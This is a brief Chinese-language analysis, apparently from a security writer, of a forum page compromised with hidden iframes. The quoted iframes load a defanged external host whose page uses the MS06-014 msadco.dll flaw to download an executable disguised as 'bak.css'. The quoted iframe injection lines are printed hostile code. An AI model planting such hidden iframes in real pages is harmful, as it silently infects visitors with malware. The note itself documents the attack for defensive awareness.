在该坛页面中发现代码:
/--- <iframe src='hxxp://www.i***p*5*60.com/error.htm' width=100 height=1></iframe> ---/
1 hxxp://www.i***p*5*60.com/error.htm
包含代码:
/--- <iframe width='100' height='100' src='wm/g15.htm'></iframe> <iframe width='100' height='100' src='wm/dm.htm'></iframe> ---/
1.1 hxxp://www.i***p*5*60.com/wm/g15.htm
利用 MS06-014: msadco.dll 严重漏洞 下载 hxxp://cIc**c.9**692*22.com/bak.css
bak.css其实是个PE格式的可执行文件